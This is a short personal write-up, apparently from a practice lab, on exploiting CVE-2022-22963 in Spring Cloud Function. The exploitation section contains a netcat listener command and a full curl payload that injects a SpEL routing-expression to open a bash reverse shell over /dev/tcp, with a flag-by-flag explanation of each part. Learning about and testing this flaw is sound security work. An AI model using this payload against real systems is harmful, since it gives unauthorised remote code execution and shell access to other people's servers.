search

Spring Cloud Function CVE-2022-22963

hashtag
Introduction

I was practicing and learning when I encountered a new vulnerability. I discovered a vulnerability called 'Local File Inclusion' (LFI) in a web application. During my exploration, I found a file named pom.xml, which I was unaware of, So after some research i found out that it is an XML file that contains information about the project and configuration details used by Maven to build the project.

Looking through the content of file and searching on google about the spring framework boot exploit, after researching i found a poc on github for CVE-2022-22963.

hashtag
CVE-2022-22963:

In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.

References:

https://0x1.gitlab.io/exploit/SpringBoot-RCE/arrow-up-right

https://github.com/me2nuk/CVE-2022-22963arrow-up-right

https://nvd.nist.gov/vuln/detail/CVE-2022-22963arrow-up-right

hashtag
Exploitation

Starting the listener.

nc -lvnp 443

Running the payload which will call back to my machine.

curl -X POST http://10.10.10.10:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec /bin/bash -i &>/dev/tcp/10.10.10.10/443 <&1"})' --data-raw 'data' -v

Explaination:

  • The -H flag is used to specify a header for the request. In this case, it's setting the spring.cloud.function.routing-expression header to a specific value.

  • The value of the header is a Spring Expression Language (SpEL) expression. It uses the T() notation to call a specific Java class and invoke a method. In this case, it's calling java.lang.Runtime.getRuntime().exec().

  • The exec() method is used to execute a command on the operating system. The command being executed is /bin/bash -c 'exec /bin/bash -i &>/dev/tcp/10.10.10.10/443 <&1'. This command is attempting to establish a reverse shell connection

  • The --data-raw flag specifies the raw data that will be included in the request body. In this case, it's set to 'data'.

  • The -v flag is used to enable verbose mode, which provides more detailed output during the request.

Got Shell

PreviousInitial Access 101NextBug Hunting

Last updated